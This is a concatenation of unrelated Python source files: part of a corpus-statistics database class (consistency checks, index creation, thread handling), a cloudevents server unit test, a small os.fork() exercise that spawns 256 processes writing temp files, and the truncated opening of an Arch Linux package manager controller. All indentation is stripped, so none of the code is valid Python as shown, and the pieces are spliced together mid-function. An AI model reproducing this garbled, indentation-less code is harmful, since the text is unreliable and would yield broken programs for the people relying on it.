syntagma = r[ix_syntagma].split(self._baseline_delimiter)
stemmed = r[ix_stemmed].split(self._baseline_delimiter)
scope = r[ix_scope]
if (len(syntagma) != scope) or (len(stemmed) != scope):
#p((len(syntagma) != len(stemmed) != 10),c="r")
consistency = False
self.logger.error("BaselineInvalidEntry: syntagma : '{}'; stemmed: '{}'; scope: '{}'; ".format(syntagma, stemmed, scope))
if self._status_bar:
if status_bar_current.count != status_bar_current.total:
status_bar_current.count = status_bar_current.total
status_bar_current.refresh()
if consistency:
status_bar_total_summary = self._get_new_status_bar(None, self.status_bars_manager.term.center("Baseline is consistent."), "", counter_format=self.status_bars_manager.term.bold_white_on_cyan('{fill}{desc}{fill}\n'))
else:
status_bar_total_summary = self._get_new_status_bar(None, self.status_bars_manager.term.center("ERROR!!! Baseline is INCONSISTENT."), "", counter_format=self.status_bars_manager.term.bold_white_on_red('{fill}{desc}{fill}\n'))
status_bar_total_summary.refresh()
self.status_bars_manager.stop()
if consistency:
return True
else:
#inconsistent_words
#inconsistent_words = inconsistent_words if self._log_content else ":HIDDED_CONTENT:"
self.logger.error("StatsDB is inconsistence. Try to set other 'baseline_delimiter' (used now: '{}') And if after that action your Baseline still stay broken than it could be an ImplementationsError. If you have this Problem, please contact Egor Savin (egor@savin.berlin).".format(self._baseline_delimiter))
return False
except Exception as e:
self.logger.error("ConsistencyTestError: '{}' ".format(repr(e)))
return False
def _check_statsdb_consistency(self):
try:
baseline = self.statsdb.lazyget("baseline", columns="syntagma", where="scope=1")
if baseline:
baseline = set([b[0] for b in baseline if b])
else:
self.logger.error("BaselineTableErorr: No one syntagma with scope 1 was found. It could mean, that this StatsDB is corrupt or inconsistent")
return False
#p(baseline, "baseline")
if self._status_bar:
try:
if not self.status_bars_manager.enabled:
self.status_bars_manager = self._get_status_bars_manager()
except:
self.status_bars_manager = self._get_status_bars_manager()
status_bar_start = self._get_new_status_bar(None, self.status_bars_manager.term.center("StatsDB-ConsistencyTest") , "", counter_format=self.status_bars_manager.term.bold_white_on_cyan("{fill}{desc}{fill}"))
status_bar_start.refresh()
normalized_word_tag = db_helper.tag_normalized_word
consistency = True
# counter_inconsistency = 0
inconsistent_words = []
##############################
########## REPLS ###########
###############################
num_repl = self.statsdb.execute("SELECT count(DISTINCT {}) FROM replications;".format(normalized_word_tag))
if num_repl:
num_repl = num_repl.fetchone()[0]
else:
self.logger.error("ERROR by getting ReplRowNumber. consistencyTest is failed.")
return False
if self._status_bar:
status_bar_repl = self._get_new_status_bar(num_repl, "ReplsCheck:", "syntagma")
for r in self.statsdb.getall("replications", columns=normalized_word_tag, distinct=True):
if self._status_bar:
status_bar_repl.update(incr=1)
#p(r[0],"r[0]")
if r[0] not in baseline:
consistency = False
# counter_inconsistency += 1
try:
word = r[0].decode()
except:
pass
inconsistent_words.append(word)
self.logger.debug(u"StatsDB is inconsistence. There Exist NO-Baseline-Entry for '{}'-word ".format(word))
##############################
########## REDUS ###########
##############################
num_redu = self.statsdb.execute("SELECT count(DISTINCT {}) FROM reduplications;".format(normalized_word_tag))
if num_redu:
num_redu = num_redu.fetchone()[0]
else:
self.logger.error("ERROR by getting ReduRowNumber. consistencyTest is failed.")
return False
#p("555")
if self._status_bar:
status_bar_redu = self._get_new_status_bar(num_redu, "RedusCheck:", "syntagma")
for r in self.statsdb.getall("reduplications", columns=normalized_word_tag, distinct=True):
if self._status_bar:
status_bar_redu.update(incr=1)
#p(r[0],"r[0]")
if r[0] not in baseline:
consistency = False
# counter_inconsistency += 1
try:
word = r[0].decode()
except:
pass
inconsistent_words.append(word)
self.logger.debug(u"StatsDB is inconsistence. There Exist NO-Baseline-Entry for '{}'-word ".format(word))
if self._status_bar:
#p((num_repl, num_redu))
#p((status_bar_repl.count, status_bar_repl.total, status_bar_redu.count, status_bar_redu.total))
if status_bar_repl.count != status_bar_repl.total:
status_bar_repl.count = status_bar_repl.total
status_bar_repl.refresh()
if status_bar_redu.count != status_bar_redu.total:
status_bar_redu.count = status_bar_redu.total
status_bar_redu.refresh()
if consistency:
status_bar_total_summary = self._get_new_status_bar(None, self.status_bars_manager.term.center("StatsDB is consistent."), "", counter_format=self.status_bars_manager.term.bold_white_on_cyan('{fill}{desc}{fill}\n'))
else:
status_bar_total_summary = self._get_new_status_bar(None, self.status_bars_manager.term.center("ERROR!!! StatsDB is INCONSISTENT."), "", counter_format=self.status_bars_manager.term.bold_white_on_red('{fill}{desc}{fill}\n'))
status_bar_total_summary.refresh()
self.status_bars_manager.stop()
if consistency:
return True
else:
#inconsistent_words
inconsistent_words = inconsistent_words if self._log_content else ":HIDDED_CONTENT:"
self.logger.error("StatsDB is inconsistence. '{}'-words don't have any entry in BaselineTable. It could be an ImplementationsError. If you have this Problem, please contact Egor Savin (egor@savin.berlin).\n InconsistentWords: '{}'. ".format(len(inconsistent_words), inconsistent_words))
return False
except Exception as e:
self.logger.error("ConsistencyTestError: '{}' ".format(repr(e)))
return False
def optimize_db(self,stream_number=1,thread_name="Thread0",optimized_for_long_syntagmas=False,min_row_pro_sream=1000, cpu_percent_to_get=50, adjust_to_cpu=True):
if not self._db_frozen:
#print("START BL CLEAN")
if self.clean_baseline_table(stream_number=stream_number,min_row_pro_sream=min_row_pro_sream, cpu_percent_to_get=cpu_percent_to_get, adjust_to_cpu=adjust_to_cpu):
#print("END BL CLEAN")
#p(self._db_frozen,"self._db_frozen")
self.statsdb.update_attr("db_frozen", True)
self.set_all_intern_attributes_from_db()
self.statsdb._commit(write_all_cash=True)
if self._db_frozen:
self.logger.info("Current StatsDB was successfully optimized.")
return True
else:
return False
else:
self.logger.info("OptimizationError: StatsDB wasn't space optimized.")
return False
else:
self.logger.warning("Current StatsDB was already optimized!")
return False
def _get_number_created_indexes(self):
all_indexes = self.statsdb._get_indexes_from_db()
created_indexes_raw = [item for item in all_indexes if "autoindex" not in item[1] ]
return len(created_indexes_raw)
def _get_created_indexes(self):
all_indexes = self.statsdb._get_indexes_from_db()
#p(all_indexes, "all_indexes")
pattern = re.compile(r"create.+index(.+)on\s.*\((.+)\)", re.IGNORECASE)
pattern_index_columns = re.compile(r"\((.+)\)")
created_indexes_raw = [(item[2],pattern.findall(item[4])[0]) for item in all_indexes if "autoindex" not in item[1]]
created_indexes = defaultdict(list)
for index in created_indexes_raw:
created_indexes[index[0]].append((index[1][0].strip(" ").strip("'").strip('"'),index[1][1].strip("'").strip('"').split(",")))
return created_indexes
def _drop_created_indexes(self, table_name="*"):
indexes = self._get_created_indexes()
if table_name == "*":
for table_name, data in indexes.iteritems():
for created_index_container in data:
self.statsdb.execute("DROP INDEX {};".format(created_index_container[0]))
else:
if table_name not in self.statsdb.tables():
self.logger.error("'{}'-Tables not exist in the given Stats-DB. ".format(table_name))
return False
def _get_column_pairs_for_indexes(self,scope=False,optimized_for_long_syntagmas=False):
columns_to_index = defaultdict(list)
if optimized_for_long_syntagmas:
scope = self.baseline_ngramm_lenght
#if scope > 5:
# scope == 4
#pass
else:
scope = scope if scope else self._min_scope_for_indexes
#scope = 0
if scope > self.baseline_ngramm_lenght:
scope = self.baseline_ngramm_lenght
for syntagma_type in ["lexem","pos"]:
normalized_word_tag_name = "normalized_word" if syntagma_type == "lexem" else "pos"
context_tag_name_r = "contextR" if syntagma_type == "lexem" else "context_infoR"
context_tag_name_l = "contextL" if syntagma_type == "lexem" else "context_infoL"
for step in xrange(scope+1):
for token_index in xrange(step):
temp_columns = []
for i in xrange(step):
if i < token_index:
col_name = u"{}{}".format(context_tag_name_l,token_index-i)
temp_columns.append(col_name)
elif i == token_index:
col_name = u"{}".format(normalized_word_tag_name)
temp_columns.append(col_name)
elif i > token_index:
col_name = u"{}{}".format(context_tag_name_r,i-token_index)
temp_columns.append(col_name)
columns_to_index[syntagma_type].append(temp_columns)
return columns_to_index
def _get_biggest_column_pairs_for_indexes(self, raw_columns_to_index):
#p(raw_columns_to_index, "raw_columns_to_index")
for syntagma_type, column_pairs in raw_columns_to_index.iteritems():
temp_pairs_for_current_syntagma_type = {}
for column_pair in column_pairs:
if column_pair[0] not in temp_pairs_for_current_syntagma_type:
temp_pairs_for_current_syntagma_type[column_pair[0]] = column_pair
else:
if len(temp_pairs_for_current_syntagma_type[column_pair[0]]) < len(column_pair):
temp_pairs_for_current_syntagma_type[column_pair[0]] = column_pair
raw_columns_to_index[syntagma_type] = temp_pairs_for_current_syntagma_type.values()
#p(raw_columns_to_index, "raw_columns_to_index")
return raw_columns_to_index
def _get_not_exists_indexes(self,raw_columns_to_index,tables_to_index,created_indexes):
indexes_optimizes = defaultdict(list,{table_name:[col[1] for col in data] for table_name, data in created_indexes.iteritems() })
columns_to_index = defaultdict(lambda:defaultdict(list))
for table_name in tables_to_index:
for syntagma_type, data in raw_columns_to_index.iteritems():
for columns_bunch in data:
if columns_bunch not in indexes_optimizes[table_name]:
columns_to_index[table_name][syntagma_type].append(columns_bunch)
#p(columns_to_index, "columns_to_index")
return columns_to_index
def create_additional_indexes(self,thread_name="Thread0", scope=False, optimized_for_long_syntagmas=False):
tables_to_index = ["replications", "reduplications"]
### Step 0: Init Status Bar
if self._status_bar:
try:
if not self.status_bars_manager.enabled:
self.status_bars_manager = self._get_status_bars_manager()
except:
self.status_bars_manager = self._get_status_bars_manager()
status_bar_start = self._get_new_status_bar(None, self.status_bars_manager.term.center("StatsDB-Indexing") , "", counter_format=self.status_bars_manager.term.bold_white_on_cyan("{fill}{desc}{fill}"))
status_bar_start.refresh()
#status_bar_current = self._get_new_status_bar(self.statsdb.rownum("baseline"), "BaselineOptimization", "syntagma")
### compute syntagmas to delete
#### Step 1: Extract exist indexes
indexes = self._get_created_indexes()
number_indexes_bevore = self._get_number_created_indexes()
#qeary = "CREATE UNIQUE INDEX {} ON {} ({});"
#qeary = "CREATE UNIQUE INDEX IF NOT EXISTS {} ON {} ({});"
qeary = "CREATE INDEX {} ON {} ({});"
### Step 2: Compute needed indexes to create
raw_columns_to_index = self._get_column_pairs_for_indexes(scope=scope,optimized_for_long_syntagmas=optimized_for_long_syntagmas)
raw_columns_to_index = self._get_biggest_column_pairs_for_indexes(raw_columns_to_index)
#p(raw_columns_to_index, "raw_columns_to_index")
#### Step3: Delete those columns_pairs, which exists in the StatsDB
columns_to_index = self._get_not_exists_indexes(raw_columns_to_index, tables_to_index,indexes)
number_to_create = len([col for table_name, data in columns_to_index.iteritems() for syntagma_type, columns in data.iteritems() for col in columns ])
### Step 4: Delete those indexes from StatsDB, which will be not needed after creation a new indexes
#index_names_to_delete_from_db = self._get_indexes_which_are_smaller_than_new_one(indexes, columns_to_index)
### Step 5: Create Indexes
if self._status_bar:
status_bar_current = self._get_new_status_bar(number_to_create, "IndexCreation:", "index")
i = 0
for table_name, data in columns_to_index.iteritems():
for syntagma_type, columns in data.iteritems():
for columns_bunch in columns:
if self._status_bar:
status_bar_current.update(incr=1)
i += 1
#p(columns_bunch, "columns_bunch")
index_name = "ix_{}_{}_scope_{}_nr_{}".format(table_name[:4],syntagma_type, len(columns_bunch),i)
prepared_qeary = qeary.format(index_name, table_name, ",".join(columns_bunch))
#p(prepared_qeary, "prepared_qeary")
self.statsdb.execute(prepared_qeary)
self.statsdb._commit(write_all_cash=True)
### Step 6: Print Status
if self._status_bar:
#bevore = i
#after = self.statsdb.rownum("baseline")
number_indexes_after = self._get_number_created_indexes()
status_bar_total_summary = self._get_new_status_bar(None, self.status_bars_manager.term.center("Indexes: NumBevore:'{}'; NumAfter:'{}'; WasCreated: '{}'.".format(number_indexes_bevore, number_indexes_after, number_indexes_after-number_indexes_bevore ) ), "", counter_format=self.status_bars_manager.term.bold_white_on_cyan('{fill}{desc}{fill}\n'))
status_bar_total_summary.refresh()
self.status_bars_manager.stop()
#print "\n"
return number_to_create
###########################Other Methods##################
def exist(self):
return True if self.statsdb else False
def db(self):
if not self._check_stats_db_should_exist():
return False
self.logger.debug("DBConnection was passed.")
return self.statsdb
####################################################################################
####################################################################################
####################################################################################
####################################################################################
####################################################################################
####################################################################################
######################################INTERN########################################
####################################################################################
####################################################################################
####################################################################################
####################################################################################
####################################################################################
#######################Status Bars##############
def _get_new_status_bar(self, total, desc, unit, counter_format=False):
#counter_format
try:
self.status_bars_manager
except AttributeError:
self.status_bars_manager = self._get_status_bars_manager()
if counter_format:
counter = self.status_bars_manager.counter(total=total, desc=desc, unit=unit, leave=True, counter_format=counter_format)
else:
counter = self.status_bars_manager.counter(total=total, desc=desc, unit=unit, leave=True)
return counter
def _get_status_bars_manager(self):
config_status_bar = {'stream': sys.stdout,
'useCounter': True,
"set_scroll": True,
"resize_lock": True
}
enableCounter_status_bar = config_status_bar['useCounter'] and config_status_bar['stream'].isatty()
return enlighten.Manager(stream=config_status_bar['stream'], enabled=enableCounter_status_bar, set_scroll=config_status_bar['set_scroll'], resize_lock=config_status_bar['resize_lock'])
def _status_bars(self):
if self.status_bars_manager:
return self.status_bars_manager.counters
else:
self.logger.error("No activ Status Bar Managers was found.", exc_info=self._logger_traceback)
return False
#################################
def _check_db_should_be_an_stats(self):
if self.statsdb.typ() != "stats":
self.logger.error("No active DB was found. You need to connect or initialize a DB first, before you can make any operation on the DB.", exc_info=self._logger_traceback)
return False
else:
return True
def _wait_till_all_threads_are_completed(self, waitername, sec_to_wait=1, sec_to_log = 15):
time_counter = sec_to_log
while not ( (len(self.threads_success_exit) >= len(self.active_threads)) or (len(self.threads_unsuccess_exit) != 0)):
#while len(self.threads_unsuccess_exit) == 0
#p(((len(self.threads_success_exit) <= len(self.active_threads))), "(len(self.threads_success_exit) < len(self.active_threads))")
#p((len(self.threads_unsuccess_exit) == 0), "(len(self.threads_unsuccess_exit) == 0)")
if time_counter >= sec_to_log:
time_counter = 0
self.logger.low_debug("'{}'-Waiter: {}sec was gone.".format(waitername, sec_to_log))
if not self.threads_status_bucket.empty():
answer = self.threads_status_bucket.get()
#p(answer, c="m")
thread_name = answer["name"]
status = answer["status"]
if status == "done":
if thread_name not in self.threads_success_exit:
self.threads_success_exit.append(answer)
elif status in ["failed", "terminated"]:
if thread_name not in self.threads_unsuccess_exit:
self.threads_unsuccess_exit.append(answer)
elif status == "ThreadsCrash":
if thread_name not in self.threads_unsuccess_exit:
self.threads_unsuccess_exit.append(answer)
self.terminate_all("ThreadsCrash", thread_name=thread_name)
self.logger.critical("'{}'-Thread returned ThreadCrash-Error. |ErrorTrackID:'{}'| (To see more about it track ErrorID in the logs)".format(thread_name,answer["track_id"]))
return False
else:
self.logger.error("ThreadsWaiter: Unknown Status was send: '{}'. Break the execution! ".format(status), exc_info=self._logger_traceback)
sys.exit()
#self.threads_status_bucket.task_done()
time.sleep(sec_to_wait)
time_counter += sec_to_wait
#p(self.threads_success_exit, "self.threads_success_exit", c="g")
#p(self.active_threads, "self.active_threads", c="g")
#p(self.threads_unsuccess_exit, "self.threads_unsuccess_exit", c="g")
#self._check_threads()
self._check_buckets()
self.logger.debug("Waiter '{}' was stopped. ".format(waitername))
return True
def _init_status_bar_for_current_thread(self,len_inp_data, thread_name="Thread0"):
if self._status_bar:
if self._threads_num>1:
if self._status_bar:
unit = "rows"
self.main_status_bar_of_insertions.unit = unit
self.main_status_bar_of_insertions.total += len_inp_data
if not self._timer_on_main_status_bar_was_reset:
#p(self.main_status_bar_of_insertions.start, "start1")
self.main_status_bar_of_insertions.start= time.time()
#p(self.main_status_bar_of_insertions.start, "start2")
self._timer_on_main_status_bar_was_reset = True
unit = "rows"
status_bar_insertion_in_the_current_thread = self._get_new_status_bar(len_inp_data, "{}:Insertion".format(thread_name), unit)
if self._status_bar:
self._check_termination(thread_name=thread_name)
self.logger.debug("_InitCurrentStatusBar: Was initialized for '{}'-Thread. ".format(thread_name))
return status_bar_insertion_in_the_current_thread
else:
False
def _initialisation_computation_process(self,thread_name="Thread0"):
### Preprocessors Initialization
#print(self.preprocessors)
if thread_name not in self.preprocessors:
if not self._init_preprocessors(thread_name=thread_name):
self.logger.error("Error during Preprocessors initialization. Thread '{}' was stopped.".format(thread_name), exc_info=self._logger_traceback)
self.threads_status_bucket.put({"name":thread_name, "status":"failed", "info":"Error during Preprocessors initialization"})
self._terminated.value = True
return False
#print(self.preprocessors)
self.logger.debug("_InitComputationalProcess: Was initialized for '{}'-Thread. ".format(thread_name))
self._check_termination(thread_name=thread_name)
def _is_redu(self, sent_index, token_index,redu_free_text_container):
try:
redu_free_text_container[sent_index][token_index][1].items
return True
except:
return False
def _check_buckets(self):
status = False
if not self.threads_error_bucket.empty():
while not self.threads_error_bucket.empty():
e = self.threads_error_bucket.get()
#self.threads_error_bucket.task_done()
self.logger.error("InsertionError(in_thread_error_bucket): '{}'-Thread throw following Exception: '{}'. ".format(e[0], e[1]), exc_info=self._logger_traceback)
status = True
# if not self.channels_error_bucket.empty():
# while not self.channels_error_bucket.empty():
# e = self.channels_error_bucket.get()
## self.channels_error_bucket.task_done()
# self.logger.error("InsertionError(in_channel_error_bucket): '{}'-Thread ('{}') throw following Exception: '{}'. ".format(e[0], e[1],e[2]), exc_info=self._logger_traceback)
# status = True
if status:
self.logger.error("BucketChecker: Some threads/channels throw exception(s). Program can not be executed. ".format(), exc_info=self._logger_traceback)
sys.exit()
def _check_termination(self, thread_name="Thread0"):
if self._terminated.value:
self.logger.critical("'{}'-Thread was terminated.".format(thread_name))
self.threads_status_bucket.put({"name":thread_name, "status":"terminated"})
sys.exit()
def _isrighttype(self, inp_data):
#p(inp_data)
check = (isinstance(inp_data, list), isinstance(inp_data, LenGen))
#p(check, "check")
if True not in check:
self.logger.error("InputValidationError: Given 'inpdata' is not iterable. ", exc_info=self._logger_traceback)
return False
return True
# def _isrighttype(self, inp_data):
# check = (isinstance(inp_data, list), isinstance(inp_data, types.GeneratorType))
# if True not in check:
# self.logger.error("InputValidationError: Given 'inpdata' is not iterable. ", exc_info=self._logger_traceback)
# return False
# return True
def _check_corp_should_exist(self):
if not self.corp:
self.logger.error("No active CorpusObj was found. You need to connect or initialize a Corpus first, before you can make any operation with Stats.", exc_info=self._logger_traceback)
return False
else:
return True
def _check_stats_db_should_exist(self):
if not self.statsdb:
self.logger.error("No active DB was found. You need to connect or initialize a DB first, before you can make any operation with Stats.", exc_info=self._logger_traceback)
return False
else:
return True
def _check_stats_db_should_not_exist(self):
if self.statsdb:
self.logger.error("An active DB was found. You need to initialize new empty Instance of DB before you can do this operation.", exc_info=self._logger_traceback)
return False
else:
return True
####################################################################################
####################################################################################
####################################################################################
####################################################################################
####################################################################################
####################################################################################
###################################Other Classes#####################################
####################################################################################
####################################################################################
####################################################################################
####################################################################################
####################################################################################
|
kncloudevents.py | #!/usr/bin/env python
"""
Copyright 2019 The Elegant Monkeys
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import unittest
import json
from kncloudevents import kncloudevents
from cloudevents.sdk import marshaller
from cloudevents.sdk.event import v03
from cloudevents.sdk import converters
import requests
from multiprocessing import Process
m = marshaller.NewDefaultHTTPMarshaller()
event = (
v03.Event().
SetContentType("application/json").
SetData({"name": "denis"}).
SetEventID("my-id").
SetSource("testing").
SetEventType("cloudevent.event.type")
)
url = "http://localhost:8080"
def func(e):
assert e.Data() == {"name": "denis"}
server = Process(target=lambda: kncloudevents.CloudeventsServer().start_receiver(func))
class TestKncloudevents(unittest.TestCase):
"""Tests for `kncloudevents` package."""
@classmethod
def setUpClass(cls):
server.start()
@classmethod
def tearDownClass(cls):
server.terminate()
def test_structured(self):
structured_headers, structured_data = m.ToRequest(event, converters.TypeStructured, json.dumps)
requests.post(url, headers=structured_headers, data=structured_data.getvalue())
def test_binary(self):
binary_headers, binary_data = m.ToRequest(event, converters.TypeBinary, json.dumps)
requests.post(url, headers=binary_headers, data=binary_data)
|
pl_3_23.py | import os, sys
import multiprocessing
"""
def files_w():
file=open("TMP"+str(os.getpid()),'w')
file.close()
for i in range(8):
newp = multiprocessing.Process(target=files_w)
newp.start()
newp.join()
"""
for i in range(8):
os.fork()
file=open("TMP"+str(os.getpid()),'w')
file.close() |
controller.py | import glob
import json
import os
import re
import shutil
import subprocess
import tarfile
import time
import traceback
from datetime import datetime
from math import floor
from pathlib import Path
from threading import Thread
from typing import List, Set, Type, Tuple, Dict, Iterable, Optional, Collection
import requests
from dateutil.parser import parse as parse_date
from bauh.api.abstract.controller import SearchResult, SoftwareManager, ApplicationContext, UpgradeRequirements, \
TransactionResult, SoftwareAction
from bauh.api.abstract.disk import DiskCacheLoader
from bauh.api.abstract.handler import ProcessWatcher, TaskManager
from bauh.api.abstract.model import PackageUpdate, PackageHistory, SoftwarePackage, PackageSuggestion, PackageStatus, \
SuggestionPriority, CustomSoftwareAction
from bauh.api.abstract.view import MessageType, FormComponent, InputOption, SingleSelectComponent, SelectViewType, \
ViewComponent, PanelComponent, MultipleSelectComponent, TextInputComponent, TextInputType, \
FileChooserComponent, TextComponent
from bauh.api.constants import TEMP_DIR
from bauh.api.exception import NoInternetException
from bauh.commons import user, system
from bauh.commons.boot import CreateConfigFile
from bauh.commons.category import CategoriesDownloader
from bauh.commons.html import bold
from bauh.commons.system import SystemProcess, ProcessHandler, new_subprocess, run_cmd, SimpleProcess
from bauh.commons.util import datetime_as_milis
from bauh.commons.view_utils import new_select
from bauh.gems.arch import aur, pacman, makepkg, message, confirmation, disk, git, \
gpg, URL_CATEGORIES_FILE, CATEGORIES_FILE_PATH, CUSTOM_MAKEPKG_FILE, SUGGESTIONS_FILE, \
get_icon_path, database, mirrors, sorting, cpu_manager, UPDATES_IGNORED_FILE, \
CONFIG_DIR, EDITABLE_PKGBUILDS_FILE, URL_GPG_SERVERS, BUILD_DIR, rebuild_detector
from bauh.gems.arch.aur import AURClient
from bauh.gems.arch.config import get_build_dir, ArchConfigManager
from bauh.gems.arch.dependencies import DependenciesAnalyser
from bauh.gems.arch.download import MultithreadedDownloadService, ArchDownloadException
from bauh.gems.arch.exceptions import PackageNotFoundException, PackageInHoldException
from bauh.gems.arch.mapper import AURDataMapper
from bauh.gems.arch.model import ArchPackage
from bauh.gems.arch.output import TransactionStatusHandler
from bauh.gems.arch.pacman import RE_DEP_OPERATORS
from bauh.gems.arch.updates import UpdatesSummarizer
from bauh.gems.arch.worker import AURIndexUpdater, ArchDiskCacheUpdater, ArchCompilationOptimizer, RefreshMirrors, \
SyncDatabases
URL_GIT = 'https://aur.archlinux.org/{}.git'
URL_SRC_INFO = 'https://aur.archlinux.org/cgit/aur.git/plain/.SRCINFO?h='
RE_SPLIT_VERSION = re.compile(r'([=><]+)')
SOURCE_FIELDS = ('source', 'source_x86_64')
RE_PRE_DOWNLOAD_WL_PROTOCOLS = re.compile(r'^(.+::)?(https?|ftp)://.+')
RE_PRE_DOWNLOAD_BL_EXT = re.compile(r'.+\.(git|gpg)$')
RE_PKGBUILD_PKGNAME = re.compile(r'pkgname\s*=.+')
RE_CONFLICT_DETECTED = re.compile(r'\n::\s*(.+)\s+are in conflict\s*.')
RE_DEPENDENCY_BREAKAGE = re.compile(r'\n?::\s+installing\s+(.+\s\(.+\))\sbreaks\sdependency\s\'(.+)\'\srequired\sby\s(.+)\s*', flags=re.IGNORECASE)
RE_PKG_ENDS_WITH_BIN = re.compile(r'.+[\-_]bin$')
class TransactionContext:
def __init__(self, aur_supported: bool, name: str = None, base: str = None, maintainer: str = None, watcher: ProcessWatcher = None,
handler: ProcessHandler = None, dependency: bool = None, skip_opt_deps: bool = False, root_password: str = None,
build_dir: str = None, project_dir: str = None, change_progress: bool = False, arch_config: dict = None,
install_files: Set[str] = None, repository: str = None, pkg: ArchPackage = None,
remote_repo_map: Dict[str, str] = None, provided_map: Dict[str, Set[str]] = None,
remote_provided_map: Dict[str, Set[str]] = None, aur_idx: Set[str] = None,
missing_deps: List[Tuple[str, str]] = None, installed: Set[str] = None, removed: Dict[str, SoftwarePackage] = None,
disk_loader: DiskCacheLoader = None, disk_cache_updater: Thread = None,
new_pkg: bool = False, custom_pkgbuild_path: str = None,
pkgs_to_build: Set[str] = None, last_modified: Optional[int] = None,
commit: Optional[str] = None, update_aur_index: bool = False):
self.aur_supported = aur_supported
self.name = name
self.base = base
self.maintainer = maintainer
self.watcher = watcher
self.handler = handler
self.dependency = dependency
self.skip_opt_deps = skip_opt_deps
self.build_dir = build_dir
self.project_dir = project_dir
self.root_password = root_password
self.change_progress = change_progress
self.repository = repository
self.config = arch_config
self.install_files = install_files
self.pkg = pkg
self.provided_map = provided_map
self.remote_repo_map = remote_repo_map
self.remote_provided_map = remote_provided_map
self.aur_idx = aur_idx
self.missing_deps = missing_deps
self.installed = installed
self.removed = removed
self.disk_loader = disk_loader
self.disk_cache_updater = disk_cache_updater
self.pkgbuild_edited = False
self.new_pkg = new_pkg
self.custom_pkgbuild_path = custom_pkgbuild_path
self.pkgs_to_build = pkgs_to_build
self.previous_change_progress = change_progress
self.last_modified = last_modified
self.commit = commit
self.update_aur_index = update_aur_index
@classmethod
def gen_context_from(cls, pkg: ArchPackage, arch_config: dict, root_password: str, handler: ProcessHandler, aur_supported: Optional[bool] = None) -> "TransactionContext":
return cls(name=pkg.name, base=pkg.get_base_name(), maintainer=pkg.maintainer, repository=pkg.repository,
arch_config=arch_config, watcher=handler.watcher, handler=handler, skip_opt_deps=True,
change_progress=True, root_password=root_password, dependency=False,
installed=set(), removed={}, new_pkg=not pkg.installed, last_modified=pkg.last_modified,
aur_supported=aur_supported if aur_supported is not None else (pkg.repository == 'aur' or aur.is_supported(arch_config)))
def get_base_name(self):
return self.base if self.base else self.name
def get_project_dir(self):
return self.project_dir or '.'
def clone_base(self):
return TransactionContext(watcher=self.watcher, handler=self.handler, root_password=self.root_password,
arch_config=self.config, installed=set(), removed={}, aur_supported=self.aur_supported)
def gen_dep_context(self, name: str, repository: str):
dep_context = self.clone_base()
dep_context.name = name
dep_context.repository = repository
dep_context.dependency = True
dep_context.change_progress = False
dep_context.installed = set()
dep_context.removed = {}
return dep_context
def has_install_files(self) -> bool:
return bool(self.install_files)
def get_packages_paths(self) -> Set[str]:
return self.install_files if self.install_files else {self.name}
def get_package_names(self) -> Set[str]:
return self.pkgs_to_build if (self.pkgs_to_build and self.install_files) else {self.name}
def get_version(self) -> str:
return self.pkg.version if self.pkg else None
def get_aur_idx(self, aur_client: AURClient) -> Set[str]:
if self.aur_idx is None:
if self.aur_supported:
self.aur_idx = aur_client.read_index()
else:
self.aur_idx = set()
return self.aur_idx
def get_provided_map(self) -> Dict[str, Set[str]]:
if self.provided_map is None:
self.provided_map = pacman.map_provided()
return self.provided_map
def get_remote_provided_map(self) -> Dict[str, Set[str]]:
if self.remote_provided_map is None:
self.remote_provided_map = pacman.map_provided(remote=True)
return self.remote_provided_map
def get_remote_repo_map(self) -> Dict[str, str]:
if self.remote_repo_map is None:
self.remote_repo_map = pacman.map_repositories()
return self.remote_repo_map
def disable_progress_if_changing(self):
if self.change_progress:
self.previous_change_progress = True
self.change_progress = False
def restabilish_progress(self):
if self.previous_change_progress is not None:
self.change_progress = self.previous_change_progress
self.previous_change_progress = self.change_progress
class ArchManager(SoftwareManager):
def __init__(self, context: ApplicationContext, disk_cache_updater: Optional[ArchDiskCacheUpdater] = None):
super(ArchManager, self).__init__(context=context)
self.aur_cache = context.cache_factory.new()
# context.disk_loader_factory.map(ArchPackage, self.aur_cache) TODO
self.configman = ArchConfigManager()
self.aur_mapper = AURDataMapper(http_client=context.http_client, i18n=context.i18n, logger=context.logger)
self.i18n = context.i18n
self.aur_client = AURClient(http_client=context.http_client, logger=context.logger, x86_64=context.is_system_x86_64())
self.dcache_updater = None
self.logger = context.logger
self.enabled = True
self.arch_distro = context.distro == 'arch'
self.categories = {}
self.deps_analyser = DependenciesAnalyser(self.aur_client, self.i18n)
self.http_client = context.http_client
self.custom_actions = {
'sys_up': CustomSoftwareAction(i18n_label_key='arch.custom_action.upgrade_system',
i18n_status_key='arch.custom_action.upgrade_system.status',
manager_method='upgrade_system',
icon_path=get_icon_path(),
requires_root=True,
backup=True,
manager=self),
'ref_dbs': CustomSoftwareAction(i18n_label_key='arch.custom_action.refresh_dbs',
i18n_status_key='arch.sync_databases.substatus',
manager_method='sync_databases',
icon_path=get_icon_path(),
requires_root=True,
manager=self),
'ref_mirrors': CustomSoftwareAction(i18n_label_key='arch.custom_action.refresh_mirrors',
i18n_status_key='arch.task.mirrors',
manager_method='refresh_mirrors',
icon_path=get_icon_path(),
requires_root=True,
manager=self),
'clean_cache': CustomSoftwareAction(i18n_label_key='arch.custom_action.clean_cache',
i18n_status_key='arch.custom_action.clean_cache.status',
manager_method='clean_cache',
icon_path=get_icon_path(),
requires_root=True,
refresh=False,
manager=self),
'setup_snapd': CustomSoftwareAction(i18n_label_key='arch.custom_action.setup_snapd',
i18n_status_key='arch.custom_action.setup_snapd.status',
manager_method='setup_snapd',
icon_path=get_icon_path(),
requires_root=False,
refresh=False,
manager=self),
}
self.index_aur = None
self.re_file_conflict = re.compile(r'[\w\d\-_.]+:')
self.disk_cache_updater = disk_cache_updater
@staticmethod
def get_aur_semantic_search_map() -> Dict[str, str]:
return {'google chrome': 'google-chrome',
'chrome google': 'google-chrome',
'googlechrome': 'google-chrome'}
def refresh_mirrors(self, root_password: str, watcher: ProcessWatcher) -> bool:
handler = ProcessHandler(watcher)
if self._is_database_locked(handler, root_password):
return False
available_countries = pacman.list_mirror_countries()
current_countries = pacman.get_current_mirror_countries()
if not available_countries:
self.logger.warning("No country available")
countries = current_countries
else:
